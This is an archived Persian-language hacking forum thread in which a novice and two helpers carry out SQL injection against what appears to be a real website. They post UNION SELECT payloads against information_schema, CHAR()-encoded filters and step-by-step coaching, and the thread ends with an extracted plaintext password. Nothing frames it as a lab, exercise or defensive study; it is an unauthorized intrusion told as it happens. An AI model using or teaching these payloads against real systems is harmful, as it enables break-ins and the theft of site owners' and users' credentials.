Train

PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : پیدا کردن column های یک table و نمایش محتویاتش


win98
04-08-2010, 11:45 PM
سلام دوستان
من دارم برای اولین بار موفق به هک کردن میشم!!!
من یه تارگت پیدا کردم که باگ sql داره و ورژنش بالای 5 است.کل table و column هاش رو هم دارم؛در میان table ها یه table با نام pass وجود داشت،در میان column هاش هم گشتم تا colmun ی به نام passwd یا چیزی تو این مایه ها پیدا کنم و بتونم بگم این column متعلق به جدول pass هست ولی یه column با نام ID وجود داشت بقیه هم اینا هستن:
CHARACTER_SET_NAME,DEFAULT_COLLATE_NAME,DESCRIPTIO N,MAXLEN,COLLATION_NAME,CHARACTER_SET_NAME,ID,IS_D EFAULT,IS_COMPILED,SORTLEN,COLLATION_NAME,CHARACTE R_SET_NAME,TABLE_CATALOG,TABLE_SCHEMA,TABLE_NAME,C OLUMN_NAME,ORDINAL_POSITION,COLUMN_DEFAULT,IS_NULL ABLE,DATA_TYPE,CHARACTER_MAXIMUM_LENGTH,CHARACTER_ OCTET_LENGTH,NUMERIC_PRECISION,NUMERIC_SC
من با دستور زیر خواستم به اطلاعات این column برسم ولی گویا این column متعلق به این table نیست!
[Only registered and activated users can see links](OR DINAL_POSITION),3,4,5,6,7,8,9+from+pass--90
البته این 90 آخری زیادیه!
حالا در ادامه از کجا بفهمم column های جدول pass کدومه؟

WinNuke
04-08-2010, 11:57 PM
این سئوال رو باید تو قسمت Inject می پرسیدی.
union select column_name from table
column_name=id
table=pass
من ساختار کلیش رو گفتم
موفق باشید

win98
04-09-2010, 12:02 AM
این سئوال رو باید تو قسمت Inject می پرسیدی.

column_name=id
table=pass
من ساختار کلیش رو گفتم
موفق باشید

با عرض معذرت که سوال رو تو جای مخصوصش نپرسیدم
من دستور زیر رو زدم :
[Only registered and activated users can see links] concat(column_name),3,4,5,6,7,8,9+from+information _schema.columns+where+Table_name='pass'
ولی باز error داد،فکر میکنم باید اسم جدول رو کد کنم؟
بلد نیستم pass رو hash کنم!
کمک کنید!

WinNuke
04-09-2010, 12:04 AM
Last edited by win98; امروز at 11:54 PM.
شما پست رو edit نکن سئوال جدیدت رو تو یه پست جدید بپرس.
اینطوری ارشیو خراب میشه.بعدا یکی می خواد استفاده کنه نمی فهمه چی به چیه.
union select column_name from information_schema.column where table_name='pass'

موفق باشید

WinNuke
04-09-2010, 12:06 AM
با عرض معذرت که سوال رو تو جای مخصوصش نپرسیدم
من دستور زیر رو زدم :
[Only registered and activated users can see links] concat(column_name),3,4,5,6,7,8,9+from+information _schema.columns+where+Table_name='pass'
ولی باز error داد،فکر میکنم باید اسم جدول رو کد کنم؟
بلد نیستم pass رو hash کنم!
کمک کنید!

error رو قرار بده.

Veron
04-09-2010, 12:07 AM
با عرض معذرت که سوال رو تو جای مخصوصش نپرسیدم
من دستور زیر رو زدم :
[Only registered and activated users can see links] concat(column_name),3,4,5,6,7,8,9+from+information _schema.columns+where+Table_name='pass'
ولی باز error داد،فکر میکنم باید اسم جدول رو کد کنم؟
بلد نیستم pass رو hash کنم!
کمک کنید!

دوست عزیز باید بگید پسوردتون چه نوع هشی هست md5 ntlm or...تا بتونم بهتون کمک کنم!

win98
04-09-2010, 12:12 AM
اینم error که WinNuke خواسته بود:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/u46150/mag-projectru/[Only registered and activated users can see links] on line 59



شاید اگه pass رو مثلا بصورت زیر در بیاریم که من اسمش رو هم نمیدونم درست بشه:
char(65,22,32)l

win98
04-09-2010, 12:15 AM
من با دستور زیر یه کارایی کردم،یعنی نام table هایی که column ی با نام pass دارند رو سرچیدم

[Only registered and activated users can see links] cat(Table_name),3,4,5,6,7,8,9+from+information_sch ema.columns+where+column_name+like+CHAR(37,%20117, %20115,%20101,%20114,%2037)

win98
04-09-2010, 12:18 AM
اینم نتیجه:

PROFILING,guest,phpjj_acl_users,phpjj_banlist,phpj j_bookmarks,phpjj_bots,phpjj_disallow,phpjj_drafts ,phpjj_forums_access,phpjj_forums_track,phpjj_foru ms_watch,phpjj_log,phpjj_moderator_cache,phpjj_mod erator_cache,phpjj_poll_votes,phpjj_poll_votes,php jj_posts,phpjj_posts,phpjj_privmsgs,phpjj_privmsgs _folder,phpjj_privmsgs_rules,phpjj_privms

win98
04-09-2010, 12:27 AM
بچه ها نتیج داد: اینو دستور رو زدم:
[Only registered and activated users can see links](pa ss),3,4,5,6,7,8,9+from+pass--

و نتیجه jadmin بود که نمیدونم پسوورده یا یوزرنیم!
کمککنید!

WinNuke
04-09-2010, 12:37 AM
دوست عزیز اینطور مواقعی
از Hexو unhex و char استفاده میشه
خوب این پسورد هستش
حالا یه چیزی مثل user یا username یا user_name تو این مایها باید باشه
اونم ممیشه userش شاید id هم باشه ولی احتمالش کمه.
پسوردم هش نیست
موفق باشید=موفق شدی:cool: